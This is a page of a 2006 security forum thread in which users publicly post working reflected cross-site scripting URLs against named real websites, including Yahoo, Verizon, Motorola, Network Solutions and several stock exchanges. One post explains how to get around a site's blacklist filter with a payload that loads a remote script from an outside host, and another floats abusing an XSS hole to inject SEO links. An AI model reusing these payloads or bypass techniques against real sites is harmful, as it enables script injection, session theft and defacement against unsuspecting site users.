Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 65
Re: So it begins
Posted by: maluc
Date: September 30, 2006 06:59PM

and it seems i finished all the antivirus companies listed on this page: http://blog.washingtonpost.com/securityfix/2005/12/ranking_response_times_for_ant.html with the exception of Symantec (which ghozt found) and F-Secure..

Good job to F-Secure, as i didn't find any issues with their site after giving it a once over

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 07:24PM

Argh. I guess it's time to start following the RFPolicy. Sorry for any inconveniences I caused with nukecops.

In other news: I still have the internets, hopefully my ISP doesn't stop my tube.



Edited 1 time(s). Last edit at 09/30/2006 07:43PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 30, 2006 07:29PM

Ghozt, don't stress too much, it could have been any of us. RFPolicy is always the best way to go, but I'm definitely guilty of not following it simply because it's not terribly effective in most cases unless you have a direct path of communication to the company in particular, and there's nothing stopping them from prosecuting you for the favor if the laws apply to your location.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 30, 2006 07:42PM

Actually, maluc you might want to lock that down:

http://maluc.sitesled.com/metaredir.html?javascript:alert(%22XSS%22);

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 07:52PM

ya, i was more than aware that it would allow XSS to my own site .. but i don't run anything there, so there's really nothing to do with scripts running on it.

Also, that host doesn't allow php/perl/cgi/etc just a free site. abuse it all you want ^^

in other news, this site http://www.enormousdating.com/go.php?name=%22%3E%3Cscript%3Ealert(%22XSS0%22)%3C/script%3E%3Cx%20&email=%22%3E%3Cscript%3Ealert(%22XSS1%22)%3C/script%3E%3Cx%20&url=%22%3E%3Cscript%3Ealert(%22XSS2%22)%3C/script%3E%3Cx%20&comments=%3C/textarea%3E%3Cscript%3Ealert(%22XSS3%22)%3C/script%3E%3Cx%20&token=&Submit=Submit seems to boost it's page rank using some fake SEO pages .. i don't know much about SEO but it might be possible to use that sites XSS hole to add a link back to you and share the rank wealth? Would be interesting if so.

Found it while googling 'sla.ckers' to get to this page, http://hlstats.dkway.info/

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 30, 2006 08:03PM

By the way: http://www.zone-h.org/content/view/14199/31/

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:12PM

i think rsnake posted that before.. just in a different thread somewhere

-yeah, in the News & Links section, which is probably where we should put all of them.. they'll get lost in here

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:26PM

and to be on the safe side RSnake.. i moved it to scripts.sitesled.com/metaredir.html

usage is the same http://scripts.sitesled.com/metaredir.html?http://asdf.com

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 08:37PM

http://support.honestnetworks.com/cgi-bin/helpdesk/pdesk.cgi?1=XSS0%22%3E%3Cscript%3Ealert%28%22XSS0%22%29%3C%2Fscript%3E%3Cx+&email=XSS1%22%3E%3Cscript%3Ealert%28%22XSS1%22%29%3C%2Fscript%3E%3Cx+&priority=3&category=Sales&subject=XSS2%22%3E%3Cscript%3Ealert%28%22XSS2%22%29%3C%2Fscript%3E%3Cx+&description=+&file=&lang=en&user=Unregistered&username=Unregistered&do=submit_req&Submit=Submit hosts with holes can be much worse than individual company ones, in terms of data loss.. if you can get a hosted company's web master to goto it

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 30, 2006 08:47PM

Maluc, that was an interesting link at hlstats... I guess I don't do enough vanity searching... I wonder why they are linking to us... Maybe they needed original content to appear less spammy. Interesting. I always wanted to be a famous porn star! ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 30, 2006 09:30PM

ya, it looks as though it was a script that googled/yahooed "hlstats" and parsed out all the links and their descriptions.. I'm a total noob at SEO so i'm not really sure if plaintext helps all the same, or non-mutual linking, but it's interesting to see. I don't really care much about SEO techniques as i don't currently have a use for it (although i likely will soon) .. but i am curious if there are ways to leech off of others SEO efforts and let them do the work for you .. laziness at its finest.

The pron star biz.. i'll let you tackle that one alone ^^;

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: metal_hurlant
Date: September 30, 2006 11:26PM

Maluc said:
> Good job to F-Secure, as i didn't find any issues with their site after giving it a once over.

They had some XSS after all..
Reported to revelant parties for now.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: October 01, 2006 02:27AM

Found another XSS vulnerability in Nukecops, looking for the email now.
Nevermind, it was the same vulnerability. Contacted anyway.



Edited 1 time(s). Last edit at 10/01/2006 02:45AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: October 01, 2006 02:51AM

http://www.fbijobs.gov/searchresult.asp?SearchString=%3Cscript%3Ealert(1)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:01PM

I love Yahoo but... (Try this in Internet Explorer) http://search.yahoo.com/search/age_restrict?accept=%22STYLE=%22xss:expression(alert('XSS'))%22

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 10/01/2006 01:02PM by rsnake.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: October 01, 2006 01:05PM

Ouch. I had to close that via Task Manager.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:26PM

Bombay stock exchange: http://www.bseindia.com/qresann/cressearch_3.asp?myScrip=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&flag=sr

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:30PM

This didn't work, but wow... what a great error message... I wonder if this is an appliance or software built into the application. Cool stuff: http://www2.bmf.com.br/pages/portal/2004/clearing1/Ativos/cotacoes/include_volume_financ_liq.asp?site=%22%3Easdf

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 01:36PM

Luxumbourg Stock Exchange: http://www.bourse.lu/application;JSESSIONID_BDL=FgHIN78WneaI5gPJOr6hhSUIXdItfJq5vqzNHb2CEGwE60YoObIT!-673487800!pportlc1!7203!7204!1100064480!pportlc2!7203!7204?origin=Content.jsp&event=bea.portal.framework.internal.refresh&pageid=HP_Static&code=&libelle=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&content=legal/Disclaimer5.jsp

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 04:00PM

It's ten cent domain day! Oh wait, no, it's XSS: https://www.networksolutions.com/custom-website-packages/domain-search.jsp?selectedDomainType=new&domainName=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E.com&loadAllNow=true&selectedProduct=DIFM_SITE_BASIC&productList=DIFM_SITE_BASIC&upsellPage=%2Fcustom-website-packages%2Fdifm-options.jsp&flowName=difm

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: October 01, 2006 04:29PM

Aw darn. Just more XSS? :P

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 01, 2006 04:41PM

hrm, i'd be interested in knowing where that was metal_hurlant.. even after they've fixed it

although i'm not surprised i'd overlook something at 3am or so .-.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 01, 2006 05:30PM

Okie, this took me quite a while to work around their hodgepodge of filters.. but finally did. there's too many to list but it's all just blacklisting which is a bad way of going about it. (as many others have already said)

unuseable: http*, <scrip*>, *(*)*, <im*, <ifram*, and some others..

in any case.. although flawed, it was and interesting attempt to blacklist any input containing script code. but this works:

><script src=//ha.ckers.org/s.js?

a simple > to &gt; would have sufficed to prevent this. http://www.nukecops.com/modules.php?name=Your_Account&redirect=%3E%3Cscript%20src=//ha.ckers.org/s.js?&folder=inbox

To Nukecops admin: You seem to follow this forum as you reacted (crazily) to Ghozt's post .. so i'll spare myself the effort of emailing you.

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: October 01, 2006 05:35PM

http://flomfamily.org/index.html/index.php?s=xss%20holes%3Cscript%3Ea=String.fromCharCode(83);alert%28String.fromCharCode(88)%2Ba%2Ba%29%3C%2Fscript%3E&submit=Search

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:13PM

Guess I'm going to have to go to Vegas and fix their XSS holes: http://www.visitlasvegas.com/vegas/site/search?keyword_global_search=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:17PM

http://www.telco.com/int/index/en/search?words=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:33PM

HellomotoXSS: http://direct.motorola.com/hellomoto/Motosupport/source/SetUpproduct.asp?productid=V180&Category=%22%3E%3CSCRIPT%3Ealert(%22XSS%22)%3C/script%3E&bluecat=

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:43PM

Can you hear me now? https://www22.verizon.com/pages/checkorder/online/?txtAreaCode=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&txtPrefix=412&txtPhoneNumber=5124&txtTrackingNumber=&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 10:49PM

Anyone speak Chinese? http://www2.chinatelecom.com.cn/areacode/result3.php?code=%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E&imageField22.x=0&imageField22.y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: October 01, 2006 11:42PM

From one of our lurkers:

> http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%3Cscript%3Ealert%28%22Hello%20World%22%29%3C%2Fscript%3E&x=19&y=11
>
> also
>
> http://searchwinit.techtarget.com/search/1,293876,sid1,00.html?query=%3Cscript%3Ealert%28%22Hello%20World%22%29%3C%2Fscript%3E&x=29&y=10
>
> This is way.... too easy...

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 10/01/2006 11:43PM by rsnake.

Options: ReplyQuote
Pages: PreviousFirst...910111213141516171819...LastNext
Current Page: 14 of 65


Sorry, only registered users may post in this forum.